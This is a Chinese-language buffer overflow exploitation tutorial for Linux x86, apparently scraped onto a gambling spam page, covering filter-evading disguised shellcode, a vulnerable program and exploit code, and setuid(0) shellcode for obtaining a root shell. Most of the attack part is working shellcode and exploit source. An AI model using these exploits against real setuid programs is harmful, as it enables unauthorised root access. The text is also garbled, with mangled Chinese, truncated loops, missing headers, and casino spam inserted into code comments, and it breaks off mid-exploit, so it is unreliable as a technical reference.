快捷搜索:  as  2018  FtCWSyGV  С˵  test  xxx  Ψһ  w3viyKQx

澳门新葡亰8455下载app_龟发之家论坛



1.先容

现今存在着好几种缓冲区溢出的代码法度榜样。早期的缓冲区溢出法度榜样功能对照简单,每每是仅仅(经由过程履行 /bin/sh)得到一个 shell 。然则现今的缓冲区溢出法度榜样已具备更多样化的措施,如绕过过滤器限定、建立套接字、冲破chroot等等。这里我们主要先容基于(intel x86)Linux下缓冲区溢出编程中一些较为高档的应用技术。

2.预备常识

你必须懂得汇编说话、C说话还有Linux。当然,你还必须知道缓冲区溢出是怎么一回事。我们站点上有关于缓冲溢出的机理阐发可供你参考。你也可以从phrak杂志的49-14找到有关的缓冲区溢出的的资料(英文)。

3.绕过过滤器限定

许多法度榜样存在缓冲区溢出问题。然则为什么并非所有的缓冲区溢出法度榜样都能被用于得到shell 呢?这是由于纵然某个法度榜样具备了缓冲区溢出的前提,大概仍旧很难进击成功。在许多环境下是因为法度榜样过滤了一些字符或者把一些字符转变为另一些字符。假如一个法度榜样过滤了所有的非打印字符,溢出漏洞就险些弗成使用了。但假如法度榜样只过滤了部分的字符,那你可以经由过程编写奇妙的缓冲区溢出代码来绕过经由过程这些过滤机制。:)

3.1 被进击的例程

vulnerable1.c

----------------------------------------------------------------------------

#include

#include

int main(int argc,int **argv)

{

char buffer[1024];

int i;

if(argc>1)

{

for(i=0;i

#include

#define ALIGN 0

#define OFFSET 0

#define RET_POSITION 1024

#define RANGE 20

#define NOP 0x90

char shellcode[]=

"\xeb\x38" /* jmp 0x38 */

"\x5e" /* po澳门新葡亰8455下载apppl %esi */

"\x80\x46\x01\x50" /* addb $0x50,0x1(%esi) */

"\x80\x46\x02\x50" /* addb $0x50,0x2(%esi) */

"\x80\x46\x03\x50" /* addb $0x50,0x3(%esi) */

"\x80\x46\x05\x50" /* addb $0x50,0x5(%esi) */

"\x80\x46\x06\x50" /* addb $0x50,0x6(%esi) */

"\x89\xf0" /* movl %esi,%eax */

"\x83\xc0\x08" /* addl $0x8,%eax */

"\x89\x46\x08" /* movl %eax,0x8(%esi) */

"\x31\xc0" /* xorl %eax,%eax */

"\x88\x46\x07" /* movb %eax,0x7(%esi) */

"\x89\x46\x0c" /* movl %eax,0xc(%esi) */

"\xb0\x0b" /* movb $0xb,%al */

"\x89\xf3" /* movl %esi,%ebx */

"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */

"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */

"\xcd\x80" /* int $0x80 */

"\x31\xdb" /* xorl澳门新葡亰8455下载app %ebx,%ebx */

"\x89\xd8" /* movl %ebx,%eax */

"\x40" /* inc %eax */

"\xcd\x80" /* int $0x80 */

"\xe8\xc3\xff\xff\xff" /* call -0x3d */

"\x2f\x12\x19\x1e\x2f\x23\x18"; /* .string "/bin/sh" */

/* /bin/sh is disguised */

unsigned long get_sp(void)

{

__asm__("movl %esp,%eax");

}

main(int argc,char **argv)

{

char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;

long addr;

unsigned long sp;

int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;

int i;

if(argc>1)

offset=atoi(argv[1]);

sp=get_sp();

addr=sp澳门新葡亰8455下载app-offset;

for(i=0;i>8;

buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;

buff[i+ALIGN+3]=(addr&0xff000000)>>24;

}

for(i=0;i

#include

int main(int argc,char **argv)

{

char buffer[1024];

seteuid(getuid());

if(argc>1)

strcpy(buffer,argv[1]);

}

----------------------------------------------------------------------------

这个法度榜样从一开始就调用seteuid(getuid())。以是,可以觉得后面的"strcpy(buffer,argv[1]);"是没有问题的。由于纵然成功地实现了缓冲区溢出进击,我们也只能获得自己的shell。不过,假如在shellcode中加入含有setuid(0)的调用,不就能够获得root的shell了吗?:)

4.2 体例setuid(0)代码

setuidasm.c

----------------------------------------------------------------------------

main()

{

setuid(0);

}

----------------------------------------------------------------------------

然后编译和反汇编

----------------------------------------------------------------------------

[ user@host ~ ] {1} $ gcc -o setuidasm -static setuidasm.c

[ user@host ~ ] {2} $ gdb setuidasm

GNU gdb 4.澳门新葡亰8455下载app17

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License,

and you are

welcome to change it and/or distribute copies of it under

certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty"

for details.

This GDB was configured as "i386-redhat-linux"...

(gdb) disassemble setuid

Dump of assembler code for function __setuid:

0x804ca00 : movl %ebx,%edx

0x804ca02 : movl 0x4(%esp,1),%ebx

0x804ca06 : movl $0x17,%eax

0x804ca0b : int $0x80

0x804ca0d : movl %edx,%ebx

0x804ca0f : cmpl $0xfffff001,%eax

0x804ca14 : jae 0x804cc10

0x804ca1a : ret

0x804ca1b : nop

0x804ca1c : nop

0x804ca1d : nop

0x804ca1e : nop

0x804ca1f : nop

End of assembler dump.

(gdb)

----------------------------------------------------------------------------

setuid(0); code

----------------------------------------------------------------------------

char code[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xor澳门新葡亰8455下载appl %ebx,%ebx */

"\xb0\x17" /* movb $0x17,%al */

"\xcd\x80"; /* int $0x80 */

----------------------------------------------------------------------------

4.3 改动老例的shellcode

现在只要在老例的shellcode的开首处,插入我们setuid(0)代码就获得了一个新的shellcode。

新的shellcode

----------------------------------------------------------------------------

char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */

"\xb0\x17" /* movb $0x17,%al */

"\xcd\x80" /* int $0x80 */

"\xeb\x1f" /* jmp 0x1f */

"\x5e" /* popl %esi */

"\x89\x76\x08" /* movl %esi,0x8(%esi) */

"\x31\xc0" /* xorl %eax,%eax */

"\x88\x46\x07" /* movb %eax,0x7(%esi) */

"\x89\x46\x0c" /* movl %eax,0xc(%esi) */

"\xb0\x0b" /* movb $0xb,%al */

"\x89\xf3" /* movl %esi,%ebx */

"\x8d\x4e\x08" /* leal 0x8(%esi),%ecx */

"\x8d\x56\x0c" /* leal 0xc(%esi),%edx */

"\xcd\x80" /* int $0x80 */

"\x31\xdb" /* xorl %ebx,%ebx */

"\x89\xd8" /* movl %ebx,%eax */

"\x40" /* inc %eax */

"\xcd\x80" /* int $0x80 */

"\xe8\xdc\xff\xff\xff" /* call -0x24 */

"/bin/sh"; /* .string \"/bin/sh\" */

----------------------------------------------------------------------------

4.4 进击法度榜样

用下面的shellcode,你可以很方便的应用代码.

exploit2.c

----------------------------------------------------------------------------

#include

#include

#define ALIGN 0

#define OFFSET 0

#define RET_POSITION 1024

#define RANGE 20

#define NOP 0x90

char shellcode[]=

"\x31\xc0" /* xorl %eax,%eax */

"\x31\xdb" /* xorl %ebx,%ebx */

"\xb0\x17" /* movb $0x17,%al */

"\xcd\x80" /* int $0x80 */

"\xeb\x1f" /* jmp 0x1f */

"\x5e" /* popl %esi */

"\x89\x76\x08" /* movl %esi,0x8(%esi) */

您可能还会对下面的文章感兴趣: